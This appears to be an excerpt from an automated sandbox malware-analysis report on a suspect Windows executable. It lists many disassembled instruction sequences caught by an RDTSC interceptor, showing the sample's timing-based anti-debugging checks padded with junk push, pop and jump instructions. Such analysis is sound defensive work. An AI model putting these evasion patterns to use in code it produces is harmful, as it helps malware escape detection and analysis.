                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A1B65 second address: 3A1B8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Dh 0x00000007 jmp 00007F29FC6B5CA2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A1B8C second address: 3A1B9A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29FC524576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A1B9A second address: 3A1B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A4DF5 second address: 3A4E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F29FC524576h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A8DC2 second address: 3A8DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A8DC6 second address: 3A8DD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3ACE76 second address: 3ACE9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F29FC6B5C9Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F29FC6B5C9Eh 0x00000011 jo 00007F29FC6B5C96h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3ACE9E second address: 3ACEA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3ACEA3 second address: 3ACEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jne 00007F29FC6B5C96h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3ACEB5 second address: 3ACEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f jne 00007F29FC524586h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3AD058 second address: 3AD064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3AD1CA second address: 3AD1F3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F29FC524576h 0x00000008 jmp 00007F29FC52457Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29FC524581h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3AD1F3 second address: 3AD209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F29FC6B5C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d ja 00007F29FC6B5CAAh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3AD209 second address: 3AD213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3AD8E2 second address: 3AD8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3AD8E6 second address: 3AD8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3ADA82 second address: 3ADA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3ADA86 second address: 3ADAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29FC524585h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3ADAA1 second address: 3ADAA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B1442 second address: 3B1446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B1446 second address: 3B1452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B1452 second address: 3B1458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B1788 second address: 3B178E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B178E second address: 3B1794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B1794 second address: 3B17C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F29FC6B5C96h 0x00000009 jmp 00007F29FC6B5C9Fh 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F29FC6B5CA1h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B196E second address: 3B197A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F29FC524576h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B197A second address: 3B197E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 331C8F second address: 331C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B753F second address: 3B7553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC6B5CA0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3B79E8 second address: 3B79EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB083 second address: 3BB0B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F29FC6B5CA3h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB0B5 second address: 3BB0E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F29FC524589h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F29FC524576h 0x00000013 jnp 00007F29FC524576h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB24E second address: 3BB272 instructions: 0x00000000 rdtsc 0x00000002 je 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F29FC6B5CA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB272 second address: 3BB276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB276 second address: 3BB27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB27C second address: 3BB285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB3DC second address: 3BB42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F29FC6B5CA8h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jnp 00007F29FC6B5C96h 0x0000001c jng 00007F29FC6B5C96h 0x00000022 jo 00007F29FC6B5C96h 0x00000028 popad 0x00000029 push ecx 0x0000002a jmp 00007F29FC6B5CA4h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB58C second address: 3BB592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB592 second address: 3BB596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB596 second address: 3BB59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB59A second address: 3BB5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F29FC6B5CA1h 0x0000000c jng 00007F29FC6B5C96h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F29FC6B5CAFh 0x0000001d jmp 00007F29FC6B5CA3h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB5D8 second address: 3BB5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB5E0 second address: 3BB5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB5E4 second address: 3BB5EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C21FB second address: 3C2209 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C2360 second address: 3C2366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C2366 second address: 3C236A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C236A second address: 3C2378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C2378 second address: 3C238A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F29FC6B5C96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C238A second address: 3C2390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C24CE second address: 3C24D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C24D3 second address: 3C24D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 366FAF second address: 366FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 366FB5 second address: 366FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F29FC524576h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 366FC2 second address: 367029 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F29FC6B5C98h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 sub dx, 4DB8h 0x0000002b mov edx, dword ptr [ebp+122D200Fh] 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F29FC6B5C98h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367029 second address: 36702E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C287A second address: 3C2889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 je 00007F29FC6B5C96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C2889 second address: 3C288D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C288D second address: 3C2893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C3447 second address: 3C344C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C344C second address: 3C3452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C3452 second address: 3C349E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29FC524576h 0x0000000a popad 0x0000000b jc 00007F29FC52457Ah 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jmp 00007F29FC52457Dh 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 ja 00007F29FC524576h 0x00000026 pop edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F29FC524585h 0x0000002e je 00007F29FC524576h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C349E second address: 3C34A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C34A9 second address: 3C34AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CAB3C second address: 3CAB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C8B77 second address: 3C8BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524584h 0x00000007 jo 00007F29FC524576h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 jl 00007F29FC524586h 0x0000001b jmp 00007F29FC52457Ah 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C8BAD second address: 3C8BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F29FC6B5C9Dh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jne 00007F29FC6B5C9Ch 0x00000017 jg 00007F29FC6B5C96h 0x0000001d push ebx 0x0000001e jmp 00007F29FC6B5C9Dh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C8FFE second address: 3C902F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29FC524585h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C902F second address: 3C9033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9033 second address: 3C905A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC524582h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C95A0 second address: 3C95A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C95A6 second address: 3C95AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C95AA second address: 3C95B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F29FC6B5C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9906 second address: 3C991F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jne 00007F29FC524576h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9B97 second address: 3C9BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F29FC6B5C96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9EE6 second address: 3C9EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29FC524576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9EF0 second address: 3C9F00 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29FC6B5C96h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9F00 second address: 3C9F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA525 second address: 3CA536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jng 00007F29FC6B5C96h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA536 second address: 3CA53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA81D second address: 3CA821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA821 second address: 3CA827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA827 second address: 3CA82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA82D second address: 3CA84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F29FC524576h 0x0000000a jmp 00007F29FC524583h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA84A second address: 3CA869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29FC6B5CA3h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CEC76 second address: 3CEC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F29FC524583h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CEC8E second address: 3CEC98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF03E second address: 3CF050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F29FC52457Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF050 second address: 3CF054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF054 second address: 3CF060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F29FC524576h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
